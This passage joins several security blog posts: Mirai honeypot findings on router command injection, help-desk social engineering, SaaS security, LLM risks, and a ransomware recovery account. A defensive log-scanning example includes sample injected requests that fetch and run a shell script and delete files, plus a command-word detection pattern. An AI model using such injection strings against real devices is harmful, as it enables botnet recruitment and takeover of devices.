3. Downloading and Executing Scripts: Many attacks found in our honeypots involve downloading additional scripts or binaries onto the device from a remote server and then executing the downloaded package. These scripts often contain malicious payloads aimed at compromising the device’s security or establishing unauthorized access. All of the downloaded scripts we reviewed continue to spread Mirai. For example, in the packet captured from our honeypots in Figure 3, the Mozi.m script is downloaded and executed.

Figure 4: NETGEAR DGN Devices Remote Command Execution

4. Operating System Commands: The commands being executed by Mirai are typically shell commands or scripts intended to manipulate the device’s operating system. They often involve commands like wget, chmod, rm and sh to download scripts, modify permissions and execute them, as you can see in the packet captured from our honeypots in Figure 4.

Figure 5: TP-Link Archer AX21 Command Injection CVE-2023-1389
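The four shared traits above (an HTTP request, shell metacharacters in a parameter, operating system commands, and a download-then-execute chain) can be turned into a simple detection rule for web or honeypot logs. The following is an added example, not SonicWall's signature logic; the log format, endpoint names and addresses are constructed for illustration.

```python
"""Flag HTTP requests that combine the injection traits seen in the honeypot data."""
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Constructed sample log (documentation-range IPs, hypothetical endpoints).
SAMPLE_LOG = """\
198.51.100.7 "GET /index.html?lang=en HTTP/1.1"
203.0.113.9 "GET /cgi-bin/diag.cgi?host=127.0.0.1%3Bwget+http%3A%2F%2F192.0.2.10%2Fbot.sh%3Bchmod+777+bot.sh%3Bsh+bot.sh HTTP/1.1"
203.0.113.44 "POST /cgi-bin/status.cgi?cmd=ping&target=%60rm+-rf+%2Ftmp%2Fx%60 HTTP/1.1"
198.51.100.23 "GET /search?q=how+to+use+chmod HTTP/1.1"
198.51.100.30 "GET /api/items?sort=name&order=asc HTTP/1.1"
"""

LINE_RE = re.compile(r'^(?P<src>\S+) "(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"$')
# Shell metacharacters that let a value break out of the intended command.
METACHARS = re.compile(r"[;|&`\n]|\$\(")
# Commands named in the honeypot findings, matched as whole words so that
# file names such as "bot.sh" or words such as "form" do not count.
COMMAND_RE = re.compile(r"(?<![\w.-])(wget|chmod|rm|sh)(?![\w.-])")


def decoded_values(target):
    """Yield the decoded path and every decoded query-parameter value.

    Parsing the query first means the '&' that separates parameters is never
    mistaken for an injected metacharacter; only '&' inside a value counts.
    """
    parts = urlsplit(target)
    yield unquote(parts.path)
    for _name, value in parse_qsl(parts.query, keep_blank_values=True):
        yield value


def analyze(line):
    """Return an alert dict for a suspicious log line, or None."""
    match = LINE_RE.match(line.strip())
    if not match:
        return None
    commands = set()
    for value in decoded_values(match["target"]):
        found = set(COMMAND_RE.findall(value))
        # Require both traits in the same value: a command word alone
        # (for example a search for "chmod") is not an injection attempt.
        if found and METACHARS.search(value):
            commands |= found
    if not commands:
        return None
    # wget followed by chmod or sh is the download-and-execute chain.
    chain = "wget" in commands and bool(commands & {"chmod", "sh"})
    return {
        "src": match["src"],
        "commands": sorted(commands),
        "severity": "high" if chain else "medium",
    }


def scan(log_text):
    """Analyze every line and return the alerts in log order."""
    return [alert for line in log_text.splitlines() if (alert := analyze(line))]


if __name__ == "__main__":
    for alert in scan(SAMPLE_LOG):
        print(alert)
```

A rule like this complements vendor signatures: it does not depend on a specific CVE, so it also surfaces variants that reuse the same pattern against a different endpoint.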

Who Has the Biggest Risk?

Figure 6: Mirai Hits by Industry

Not all industries are affected the same for every attack vector. By digging into the data provided by our over 1 million sensors worldwide, we can determine which industries are most impacted by the Mirai botnet, as you can see in Figure 6. Real estate and rental businesses appear to be affected the most by Mirai attacks, with the data showing 86.09% of attacks focused on compromising property management systems. The finance and insurance sectors are also taking on a substantial number of attacks with around 9.65% of attacks focused on the financial sector looking to potentially expose sensitive financial data and cause disruptions to online banking services. The wholesale trade (1.88%) and professional, scientific and technical services (1.49%) sectors aren’t immune either, as they can experience supply chain disruptions and compromised networks.

Identification and Mitigation

The recent data seen by both our firewalls and honeypots underscores the urgent need to secure IoT devices to prevent their exploitation for malicious purposes. While each of the mentioned vulnerabilities affects different router products from various manufacturers, there are some common factors that contribute to their susceptibility to exploitation by malware like Mirai. Understanding these factors can assist in preventing and detecting these types of attacks.

1. Firmware Issues: Many of these vulnerabilities stem from weaknesses in the firmware of the routers. Firmware vulnerabilities can arise due to poor coding practices, insufficient testing or failure to address reported security issues promptly.

2. Insecure Web Interfaces: Several vulnerabilities involve the routers’ web interfaces, which allow users to configure settings and manage the device. Weaknesses in authentication mechanisms or improper input validation can lead to remote code execution or command injection.

3. Shell Metacharacters: Exploitation often involves the use of shell metacharacters in user-supplied input fields. These metacharacters allow attackers to manipulate command execution, enabling them to execute arbitrary commands on the router.

4. Delayed or Lack of Patching: In many cases, vulnerabilities exploited by Mirai and similar malware have been previously disclosed, but routers remain unpatched due to delayed or absent firmware updates. This leaves devices vulnerable to exploitation even after fixes are available.

5. Default Configurations: Default configurations, including default usernames and passwords, are often targeted by attackers. If users fail to change these default credentials, attackers can easily gain unauthorized access to the router.

To ensure customers are prepared for any exploitation that may occur due to these vulnerabilities, the following signatures have been released which can detect and prevent these types of attacks:

  • IPS 18387 D-Link DIR-645 HNAP SOAPAction Header Command Injection
  • IPS 15761 Zyxel USG FLEX 100W Command Injection
  • IPS 13034 NETGEAR DGN Devices Remote Command Execution
  • IPS 15864 TP-Link Archer AX21 Command Injection
  • GAV Mirai

In addition to traditional signatures, Managed Service Providers (MSPs) can significantly enhance protection for small businesses against Mirai botnet attacks. They can deploy the human layer of security to identify attacker behaviors across their networks with full network visibility and proactive threat detection capabilities. By offering a multi-layered defense strategy, MSPs provide small businesses with the expertise and resources needed to defend against evolving cyber threats like the Mirai botnet.

Mirai’s “Mirai” (Future)

The data suggest that Mirai and its variants will continue to evolve, becoming more sophisticated and dangerous. These botnets are likely to incorporate new techniques specifically designed to exploit vulnerabilities in IoT devices, making them even more effective at compromising a wide range of targets. We can also expect these threats to employ advanced evasion tactics to bypass traditional security measures, making detection and mitigation more challenging. Additionally, the target surface for these attacks is expected to broaden significantly, especially as 5G continues to allow more devices with limited reviewed firmware to be network-connected. As technology advances, Mirai is likely to set its sights on emerging technologies, including smart home devices, industrial IoT systems and critical infrastructure.

Protecting against Mirai and similar threats requires a multi-faceted approach. Device manufacturers must prioritize security in their designs, ensuring robust authentication and regular updates. Users need to apply patches promptly to mitigate known vulnerabilities. Implementing network segmentation and strict access controls can limit the impact of Mirai attacks. Behavioral analysis through Intrusion Detection Systems (IDS) and Intrusion Prevention Systems (IPS) aids in early detection, while traffic monitoring helps identify Distributed Denial of Service (DDoS) attacks. Managed Service Providers (MSPs) are invaluable in monitoring alerts and identifying these types of attacks. Collaboration through threat intelligence sharing enhances collective defense, and educating users on securing IoT devices is crucial for prevention.

 

 

 

The post Decoding Router Vulnerabilities Exploited by Mirai: Insights from Honeypot Data appeared first on Cybersecurity Insiders.

According to Gartner, worldwide end-user spending on security and risk management is projected to total $215 billion in 2024. That is up nearly 15 percent from 2023. This increase in investments is happening for a good reason. Just look at the spike in ransomware attacks alone. According to recent Corvus Insurance research, ransomware attacks increased by 68 percent in 2023 (over 2022), establishing a new record for a single year at 4,496. 

Yet, as businesses invest in new and innovative technologies to tighten the perimeter and battle increasingly sophisticated attacks—endpoint detection and response, secure access service edge, identity and access management, the list goes on—many are continuing to leave critical gaps that cybercriminals can and will exploit. One example is the IT help desk.

Help desks are being leveraged as a side door for cybercriminals, and for anyone questioning just how big an oversight this is, look no further than a leading Las Vegas resort. Last September, cybercriminals leveraged LinkedIn to get details on a resort employee, which were then used to socially engineer the IT help desk into resetting the user’s account. That kicked off a cascading series of unfortunate events leading to a full-on ransomware attack. The full impact was apocalyptic: digital key cards for rooms stopped working, credit card terminals shut down, slot machines went out of service, and more.

In a battle where businesses exhaust vast sums of money to mitigate increasingly sophisticated attacks, incidents such as this stand out because the access point, a user account, and the tactics employed were actually both very low-tech. Yet, despite its simplicity, this approach allows attackers to skip several steps in a short amount of time. 

As I’ve been hearing more and more lately, “Attackers don’t break in; they log in.” The resort above is by no means alone. Many other companies have been victimized through the help desk and are responding with investments in secure multifactor authentication (MFA), which requires that employees provide multiple types of verification information. MFA is a great first step, but on its own is not enough. 

Many businesses fail to seal all gaps by not investing in processes to validate users before help desk personnel comply with requests to reset credentials. As a result, attackers armed with key pieces of personal information needed to pass the verification processes can cajole help desk personnel into resetting account credentials or the MFA method. From there, they gain free rein to an array of privileged information. 

To fully seal the side doors and prevent breaches, help desk personnel should employ additional steps, including a multi-step verification process. Multi-step verification requires additional verification factors, which decreases the likelihood of a threat actor taking over an account. The key is asking users to provide details beyond any information they could glean from a site such as LinkedIn and other social media destinations. Yes, I’m talking about those overused security questions relying on relatively accessible information such as your mother’s maiden name, the street you grew up on, or high school mascot.

Another element that can help is adding visual verification components. This could be as simple as a video call where the employee’s manager or a team member jumps on Zoom to verify that the person is who they say they are. Businesses can also take the next step and employ face-recognition technologies while tying in contextual information. 

A final set of verification factors to consider are location, network, and time of day. Each of these can be valuable in verifying that the person is who they say they are. 

Train Your Help Desk

Take the time to educate your help desk team on the latest tactics used by attackers. For example, attackers often create a fake sense of urgency, hoping that this need for immediate help or access will result in staff skipping key verification steps and giving the attacker what they are asking for. This is especially true when attackers are impersonating someone high-ranking at the company. Since this is a tried-and-true tactic, all help desk personnel should be trained to spot it and manage it accordingly.

Well-trained help desk employees should also be able to pick up on other cues. For example, when the help desk team asks a series of personal questions, there is an opportunity to not just wait for answers but to pick up on behavioral cues. There may be instances when a help desk employee may notice that the caller or person on chat takes an unusual amount of time to answer basic questions. This can be a strong indication that they aren’t who they claim to be. 

Stop Oversharing

In addition to the help desk, the company’s security team should work to educate all employees regarding the information they share on social media channels. As many of us know from personal experience, many sites ask the same verification questions when you cannot recall your password. You know the ones—what street you grew up on, the name of your first school, what was your high school mascot, what is your mother’s maiden name, etc. I also know that many people inadvertently share the answers to these questions through the information they post on social media. As a result, they put them out there where anyone can grab them. Work closely with your team to ensure that the information they are tying into key verification questions is not the same as what they could be posting online.

In a world where increasingly sophisticated cybercriminals are waging battle against highly innovative security solutions, the simplicity of a help desk attack stands out, and in all likelihood, other bad actors are taking notice. That’s why companies must act now and take the necessary steps to help ensure that help desk personnel are not giving away the company keys to the wrong people, or even unlocking the door for them. 

The good news is that by investing in additional solutions and providing help desk personnel and general employee education, you will be able to fortify the help desk side door.

__

Ryan Bell, Threat Intel Manager, Corvus Insurance

Ryan has been at Corvus Insurance for over a year as the Manager of the Threat Intelligence Team. His role revolves around keeping Corvus insureds a step ahead of threat actors using a wealth of cybersecurity expertise. During his time at Corvus, the Threat Intelligence team has matured proactive alerting and intelligence analytics capabilities, supporting Corvus’s leading loss ratio and stature as a thought leader in cybersecurity. His background includes a graduate degree in sociology, undergraduate degrees in sociology and digital forensics, and numerous experiences starting and leading threat intelligence teams. 

The post Help Desk Personnel are the Side Door for Cybercriminals appeared first on Cybersecurity Insiders.

Distributing cloud solutions and services via a proprietary SaaS platform can be a highly profitable business model. Vendors of successful platforms can earn hundreds of millions of dollars annually, following the examples of Datadog, Hubspot, Salesforce, and other SaaS market players.

However, when developing a SaaS platform, vendors have to ensure the security of data they process and store. A single data breach can ruin a platform’s reputation and discourage thousands of paying customers from using it. Additionally, the platform’s vendor can be fined by a data protection regulator. To avoid these issues, a vendor should properly secure its SaaS platform against cyber threats.

In this article, we cover the most dangerous cyber threats for a SaaS platform and provide four tips on how a vendor can mitigate them.

Key security threats for a SaaS platform

• Malware attacks

Malware is any malicious program used to penetrate and infiltrate a target cloud system or environment. According to Thales’ 2024 Data Threat Report, 41% of companies faced a malware attack last year, and cloud storage, SaaS applications, and cloud infrastructure management tools were primary targets.

SQL injection attacks, enabling hackers to penetrate vulnerable SQL servers across a cloud infrastructure, are one of the most dangerous for SaaS platforms. A hacker could use this attack to corrupt a SaaS vendor’s corporate data, steal sensitive customer information, or disrupt a SaaS platform’s work.

• DoS/DDoS attacks

A DoS attack involves sending a large number of requests to the vendor’s servers to make a SaaS platform unavailable to users. DDoS is a more large-scale type of DoS attack that involves sending a large volume of traffic from multiple compromised sources. As highlighted in the DDoS Threat Report for 2024 Q1 by Cloudflare, DDoS attacks have become 50% more frequent compared to 2023.

According to the same report, four out of ten DDoS attacks lasted more than 10 minutes, while almost three out of ten lasted more than 1 hour. Given that customers expect 99.999% uptime from their SaaS and cloud service providers, mitigating DDoS attacks in a timely manner can be critical for a vendor to remain competitive.

• Insider threats

An insider is a person (employee, business partner, etc.) with authorized access to the SaaS platform’s vendor’s systems, infrastructure, or data. Abusing this authorized access for sabotage, espionage, or other malicious purposes is an insider attack.

The 2024 Data Exposure Report by Code42 reveals that the number of companies that faced insider attacks has grown from 66% to 76% during 2019-2024. According to the same report, a single insider attack costs a business $15 million on average.

How to make your SaaS platform secure

Implementing secure development practices

SaaS vendors can mitigate many potential security risks and vulnerabilities by implementing appropriate security measures early in the platform development. Here are some practices that can help build a more secure SaaS platform:

• Threat modeling

Threat modeling involves identifying the most dangerous threats for the future SaaS platform, assessing their potential impact, and defining the best ways to mitigate them. By using tools such as OWASP Threat Dragon or Microsoft Threat Modeling Tool, IT teams can build and visualize threat models, analyze architecture designs for vulnerabilities, and generate insights on how to avoid potential attacks.

• Software Bill of Materials

In manufacturing, Bills of Materials (BOM) are lists covering all components required to build particular product items. BOM, which allows manufacturers to maintain complete component visibility, can also be used for SaaS platform development.

A Software Bill of Materials (SBOM) lists all libraries, scripts, licenses, services, and other components in a software solution. By documenting an SBOM during platform engineering, developers can ensure full component transparency and streamline a platform’s vulnerability and risk management.

In practice, SBOMs allow developers to easily track current versions of different software components, which helps prioritize software fixes and updates to prevent critical vulnerabilities. Security teams can also use an SBOM to understand the scope of security incidents and identify affected components, addressing potential cyber attacks more efficiently.

• Continuous testing

Continuous testing involves implementing security checks at multiple stages of the software development life cycle (SDLC). One of the essential continuous testing approaches is shift left testing, enabling IT teams to detect vulnerabilities at early software development stages and thus eliminate potential cyber threats quicker and with fewer resources.
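The SBOM use described above, identifying which components an advisory affects, can run as an automated check at an early pipeline stage. The following is an added example, not part of the original article: the CycloneDX-style SBOM, the package names and the advisory IDs are all constructed placeholders.

```python
"""Match SBOM components against advisories to find affected versions."""
import json

# Constructed CycloneDX-style SBOM; component names are placeholders.
SBOM_JSON = """{
  "bomFormat": "CycloneDX",
  "specVersion": "1.5",
  "components": [
    {"type": "library", "name": "example-logging", "version": "2.14.1",
     "purl": "pkg:maven/com.example/example-logging@2.14.1"},
    {"type": "library", "name": "example-http", "version": "1.9.0",
     "purl": "pkg:pypi/example-http@1.9.0"},
    {"type": "library", "name": "example-yaml", "version": "5.4",
     "purl": "pkg:pypi/example-yaml@5.4"},
    {"type": "library", "name": "example-http", "version": "main-snapshot"},
    {"type": "application", "name": "billing-service", "version": "3.0.0-rc1"}
  ]
}"""

# Constructed advisories: affected range is introduced <= version < fixed.
ADVISORIES = [
    {"id": "EXAMPLE-ADV-001", "package": "example-logging",
     "introduced": "2.0.0", "fixed": "2.17.1", "severity": "critical"},
    {"id": "EXAMPLE-ADV-002", "package": "example-yaml",
     "introduced": "0", "fixed": "5.4", "severity": "high"},
    {"id": "EXAMPLE-ADV-003", "package": "example-http",
     "introduced": "1.0.0", "fixed": "1.9.1", "severity": "medium"},
]

SEVERITY_RANK = {"critical": 0, "high": 1, "medium": 2, "low": 3}


def load_sbom(text):
    """Parse the SBOM document from JSON text."""
    return json.loads(text)


def parse_version(text):
    """Turn '2.14.1' into (2, 14, 1); raise ValueError if not numeric.

    Pre-release and build suffixes ('-rc1', '+build5') are ignored, and
    trailing zeros are dropped so that 5.4.0 compares equal to 5.4.
    """
    core = text.split("-", 1)[0].split("+", 1)[0]
    parts = core.split(".")
    if not all(p.isdigit() for p in parts):
        raise ValueError(f"unparseable version: {text!r}")
    nums = [int(p) for p in parts]
    while len(nums) > 1 and nums[-1] == 0:
        nums.pop()
    return tuple(nums)


def affected_components(sbom, advisories):
    """Return (findings, needs_review) for the given SBOM.

    A component whose version cannot be parsed is never silently treated
    as safe: it goes to needs_review so a person can check it.
    """
    by_package = {}
    for adv in advisories:
        by_package.setdefault(adv["package"], []).append(adv)

    findings, needs_review = [], []
    for comp in sbom.get("components", []):
        name, version = comp.get("name"), comp.get("version") or ""
        for adv in by_package.get(name, []):
            try:
                current = parse_version(version)
            except ValueError:
                needs_review.append({"component": name, "version": version,
                                     "advisory": adv["id"]})
                continue
            low, high = parse_version(adv["introduced"]), parse_version(adv["fixed"])
            if low <= current < high:
                findings.append({"component": name, "version": version,
                                 "advisory": adv["id"],
                                 "severity": adv["severity"],
                                 "upgrade_to": adv["fixed"]})
    # Most severe first, so fixes can be prioritized.
    findings.sort(key=lambda f: SEVERITY_RANK.get(f["severity"], 99))
    return findings, needs_review


if __name__ == "__main__":
    found, review = affected_components(load_sbom(SBOM_JSON), ADVISORIES)
    for item in found + review:
        print(item)
```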

Ensuring ISO 27001 and SOC 2 compliance

ISO 27001 and SOC 2 are two information security standards that help SaaS vendors maintain IT security within their organizations, which in turn can contribute to the security of the solutions they provide. Although adhering to these standards helps strengthen data security, only 8% of SaaS providers have achieved both ISO 27001 and SOC 2 compliance, according to Vertice’s 2023 data.

ISO 27001 focuses on establishing a reliable information security management (ISM) system, which in turn defines security controls for the software development process. For instance, if a vendor is developing its SaaS platform in-house, ISO 27001-based ISM can guide a corporate testing team on how often they should run security tests and of what kind.

SOC 2 also establishes necessary data security controls for the software development process, helping make the SDLC more transparent, traceable, and controllable. For example, it prescribes that software developers adhere to specific secure coding practices, such as input validation or output encoding, to avoid vulnerabilities in the code and ensure the SaaS platform’s security.

Improving physical security across an organization

SaaS platform vendors can establish their own data centers, rent cloud storage from third-party providers, or use a hybrid data storage approach. If a vendor houses some volume of data and workloads on-premises, they must ensure that their servers and data centers are sufficiently protected to avoid an insider threat. 

Implementing a video surveillance system augmented with artificial intelligence technology is one way to protect a vendor’s physical infrastructure. When installed in a server room, such a system can detect suspicious behavior of those who enter the room and alert security teams about potential threats in real time.

Resorting to managed cybersecurity services

Establishing a security operations center (SOC) to identify and prevent cyber threats is an efficient way to address DDoS attacks. However, building one in-house can be challenging for a SaaS platform vendor, as it requires hiring and training security specialists, not to mention significant equipment and technology investments.

Outsourcing security operations to third-party experts is a great way for vendors to avoid these complexities. A third-party team can act as a dedicated security operations center that monitors traffic across a vendor’s network infrastructure, detecting various security incidents, such as DDoS attacks, and responding to them promptly, helping a vendor ensure 24x7x365 protection of the SaaS platform.

Final thoughts

Developing and monetizing a SaaS platform allows a vendor to earn millions yearly by selling business solutions and services to clients. Although this business model is promising, it’s also risky, as even minor cybersecurity breaches can cause significant reputational and financial losses.

Fortunately, vendors can avoid these risks by strengthening the cybersecurity of their SaaS platforms. Using secure coding practices, following ISO 27001 and SOC 2 security standards, and enhancing the physical security of servers and data centers are just some of the essential measures that can make a great difference.

Also, vendors can outsource to experienced security professionals who help develop a reliable SaaS platform and then provide managed cybersecurity services, helping prevent security threats of all kinds.

 

The post How to ensure the security of your SaaS platform appeared first on Cybersecurity Insiders.

AI is evolving at a rapid pace, and the uptake of Generative AI (GenAI) is revolutionising the way humans interact with and leverage this technology. GenAI is based on large language models (LLMs) that have shown remarkable capabilities for breaking down barriers between humans and machines – from generating human-like text to powering conversational interfaces and automating complex tasks.

Even though we are at the early stages of LLM adoption, businesses are preparing the way to build LLM-powered applications. Initial findings from our customers reveal that one out of four customers is building LLM-powered applications and around 20% of them are using OpenAI as their LLM. According to a developer survey by Stack Overflow, 70% of developers are using or are planning to use AI tools in their development process.

However, while businesses are strongly driven to embrace LLM adoption, in many cases fear or a lack of knowledge about the evolving attack vectors and AI-powered threats that come with it will slow down innovation.

The Open Worldwide Application Security Project (OWASP) Top 10 list for LLM applications has driven further awareness around the risks from LLM adoption by highlighting the critical need for security tools and processes to confidently manage the rollout of GenAI technology. Three key areas of focus within the OWASP Top 10 for LLMs include Prompt Injection, Insecure LLM Interaction, and Data Access.

But how do these specifically affect cloud native applications, and what is important to know about these attack vector techniques? 

Top three LLM risks identified by the OWASP framework

  1. Prompt Injection – a new but serious attack technique specific to LLMs. Here the attacker crafts inputs designed to mislead or manipulate the model, with the intention of generating unintended or harmful responses. The model relies on input prompts to generate outputs, which allows attackers to inject malicious instructions or context in line with these prompts. Prompt injection, if not identified, can lead to unauthorised actions or data breaches, compromising system security and integrity.
  2. Insecure LLM Interaction – LLMs interact with other systems, increasing the risk that their outputs can be leveraged for malicious activities, such as executing unauthorised code or initiating cybersecurity attacks. These threats pose significant risks of data leaks and identity theft, and compromise both security and data integrity.
  3. Data access – LLMs store all the information they consume, heightening the level of data leakage risk when sensitive information is unintentionally exposed or accessed by an unauthorised person through the model’s output. The risk associated with improper data access controls is significant, as it can lead to unauthorised data exposure or breaches, jeopardising both privacy and security. Proper controls are essential to mitigate this risk and ensure sensitive information stored within an LLM is processed and stored securely.

Businesses must be able to confidently navigate the complexities of LLM-based application development and deployment, ensuring compliance with regulatory standards and safeguarding against malicious exploits.

Here are the three key steps organisations must take to secure LLM applications from code to cloud:

1. Discovery phase

It is important to remember that as GenAI makes it simpler to set up applications, cybercriminals are seeking the same benefits. For example, AI agents can easily and quickly bring productivity and speed to operations, but this evolution must be coupled with a robust security strategy for managing and monitoring agent-based systems.

It starts by asking some crucial questions about who is using GenAI across the organisation, how, and for what LLM applications. A thorough assessment is needed here, one that identifies the various LLM applications or planned applications and how they interact with the full lifecycle, from code to cloud. The process involves identifying which microservices in the application have used or are backed by LLM-generated code and assessing the most common vulnerabilities associated with the nature of the application.

Understanding the different kinds of threats and integrating them with a business strategy will make sure LLM applications securely empower rather than hinder the business.

2. Protecting vulnerabilities and threats – in code, misconfiguration or runtime

Then it is about protecting the application that uses AI across the entire cloud application lifecycle. It is essential to employ advanced code scanning technology to identify and mitigate the unsafe use of LLM in application code, including unauthorised data access, misconfigurations, and vulnerabilities specific to LLM-powered applications.

By actively monitoring the workloads of LLM-powered applications, organisations can prevent unauthorised actions that LLMs might attempt, such as executing malicious code due to prompt injection attacks.

3. Implementing guardrails 

Specific GenAI assurance policies serve as guardrails for developers of LLM-powered applications. When based on practices from the OWASP Top 10 for LLMs, these policies will prevent unsafe usage of LLMs.

With GenAI assurance policies enforced, alongside holistic protection across the entire cloud native application lifecycle, businesses and industries can truly embrace the transformative potential of GenAI. New standards and comprehensive protection for LLM-powered applications from code to cloud bridge the gap between security requirements and development processes, allowing organisations to fully embrace innovation while mitigating potential risks.
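
As an added illustration of the code scanning and guardrail steps above (not code from the article or from any vendor's product), this Python check walks a program's syntax tree and reports where LLM output reaches a code-execution, shell or database call without validation. The source names `ask_llm` and `llm_complete`, the sink list and the sample application code are assumptions constructed for the example.

```python
import ast

# Assumed names, not from the article: wrappers whose return value is raw
# model output, and call names that must never receive it unvalidated.
LLM_SOURCES = {"ask_llm", "llm_complete"}  # hypothetical helper functions
DANGEROUS_SINKS = {"eval", "exec", "system", "run", "Popen", "execute"}

def call_name(node):
    """foo() -> 'foo'; pkg.mod.foo() -> 'foo'; anything else -> None."""
    func = node.func
    if isinstance(func, ast.Attribute):
        return func.attr
    return func.id if isinstance(func, ast.Name) else None

class LLMOutputPolicy(ast.NodeVisitor):
    """Single-pass, name-based taint check: model output must not reach a sink."""
    def __init__(self):
        self.tainted, self.findings = set(), []

    def is_tainted(self, expr):
        for sub in ast.walk(expr):
            if isinstance(sub, ast.Name) and sub.id in self.tainted:
                return True
            if isinstance(sub, ast.Call) and call_name(sub) in LLM_SOURCES:
                return True
        return False

    def visit_Assign(self, node):
        # Anything computed from model output is itself treated as model output.
        if self.is_tainted(node.value):
            for target in node.targets:
                self.tainted |= {n.id for n in ast.walk(target) if isinstance(n, ast.Name)}
        self.generic_visit(node)

    def visit_Call(self, node):
        args = list(node.args) + [kw.value for kw in node.keywords]
        if call_name(node) in DANGEROUS_SINKS and any(map(self.is_tainted, args)):
            self.findings.append((node.lineno, call_name(node)))
        self.generic_visit(node)

def scan(source):
    """Return [(line, sink)] for every sink call fed by LLM output."""
    policy = LLMOutputPolicy()
    policy.visit(ast.parse(source))
    return policy.findings

# Constructed sample application code (line 1 is the blank line after ''').
SAMPLE = '''
import subprocess
reply = ask_llm(user_prompt)
cmd = "ls " + reply
subprocess.run(cmd, shell=True)
summary = ask_llm(document)
print(summary)
eval(ask_llm(question))
subprocess.run(["ls", "-l"])
'''

if __name__ == "__main__":
    for line, sink in scan(SAMPLE):
        print(f"line {line}: LLM output reaches {sink}()")
```

Matching is by call name only, so findings are a review signal rather than proof of a vulnerability; a build pipeline could fail on any finding that is not explicitly waived.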

The post Embracing the benefits of LLM securely appeared first on Cybersecurity Insiders.

The rise of sophisticated cyberattacks and increasingly brazen attackers is a well-established threat. Businesses and organizations need to take action and be aware of the risks cyberattacks and data breaches pose to their daily functions, financial statements, and reputation. A recent ransomware incident involving IxMetro PowerHost, a Chilean data center and hosting provider with operations spanning the USA, South America, and Europe, is a stark reminder of these dangers.

The ransomware deployed by a threat actor group known as “SEXi” was specifically designed to target ESXi environments, a choice reflected in the group’s name, which is an anagram of ESXi. This suggests a deliberate focus on these systems, leveraging specific vulnerabilities or misconfigurations common in such setups. Once inside the network, the ransomware likely utilized scripts or automated processes to locate and encrypt ESXi server data systematically, rendering the virtual machines (VMs) and their associated data inaccessible. This method ensures a high-impact disruption, as each encrypted ESXi server simultaneously affects multiple clients and services.

The Attack History

April 2024 saw the emergence of the SEXi ransomware gang, which launched a strategic attack on PowerHost’s VMware ESXi servers hosting their clients’ virtual private servers (VPS). The ransomware, specifically crafted to exploit vulnerabilities in ESXi systems, spread rapidly across the network. It systematically encrypted data on the servers and backups, crippling the virtual machines (VMs) and rendering crucial data inaccessible.

SEXi’s method was particularly devastating because it focused on the centralization of multiple virtual environments within single physical servers. This strategy maximized disruption by encrypting a limited number of high-value targets, significantly impacting PowerHost’s clients. This approach demonstrates an evolution in ransomware tactics, where attackers aim to negate the victim’s ability to recover independently, thus strengthening their leverage.

The ransomware encrypted terabytes of data, effectively rendering numerous websites and services hosted on these servers inaccessible. The ransomware gang demanded a ransom of two bitcoins per victim, which would have amounted to an astronomical $140 million.

Mitigation and Recovery

As customers began experiencing service outages, PowerHost’s IT team swiftly identified the ransomware infection. Recognizing the severity of the situation, they enlisted the expertise of Proven Data’s cybersecurity specialists. Simultaneously, PowerHost’s CEO, Ricardo Rubem, coordinated with law enforcement agencies across multiple countries to gain insights and formulate a response strategy. The clear consensus from these agencies was to refrain from paying the ransom.

Although the ransomware had encrypted both primary data and backups, PowerHost and Proven Data worked tirelessly to restore services. Leveraging advanced decryption techniques and cutting-edge recovery tools, the joint effort resulted in successful data recovery for IxMetro PowerHost. This critical intervention saved the company from the staggering $140 million ransom demand and minimized operational downtime and financial losses.

While the recovery process is still ongoing, PowerHost has offered affected VPS customers the option to set up new VPS systems, enabling some customers to resume online operations.

Results

PowerHost’s collaboration with Proven Data cybersecurity experts and law enforcement agencies was crucial and underscored the importance of collective efforts in combating cyber threats. This collaborative approach was a testament to the strength of the cybersecurity community and its commitment to protecting businesses and organizations.

The incident also highlights the importance of transparent and timely communication with customers, which is vital in maintaining trust and managing the fallout from such attacks.

Lessons Learned

The ransomware attack on PowerHost is a critical lesson for businesses worldwide about the necessity of robust cybersecurity measures. By learning from PowerHost’s experience, other companies can fortify their defenses and better protect themselves against the ever-growing ransomware threat. The incident highlights the strength of the cybersecurity community and its unwavering commitment to safeguarding businesses and their operations.

About Bogdan Glushko

Bogdan Glushko is the Chief Information Officer of Proven Data. Glushko actively leverages his years of experience restoring thousands of critical systems after incidents. Glushko is a trusted voice guiding organizations on resilient data strategies, ransomware response protocols, and mitigating evolving cyber threats. Through proven leadership, he continues delivering cutting-edge data preservation and recovery solutions that fortify business resilience against breaches, outages, and data loss from modern cyber attacks.

The post Proven Data Restores PowerHost’s VMware Backups After SEXi Ransomware Attack appeared first on Cybersecurity Insiders.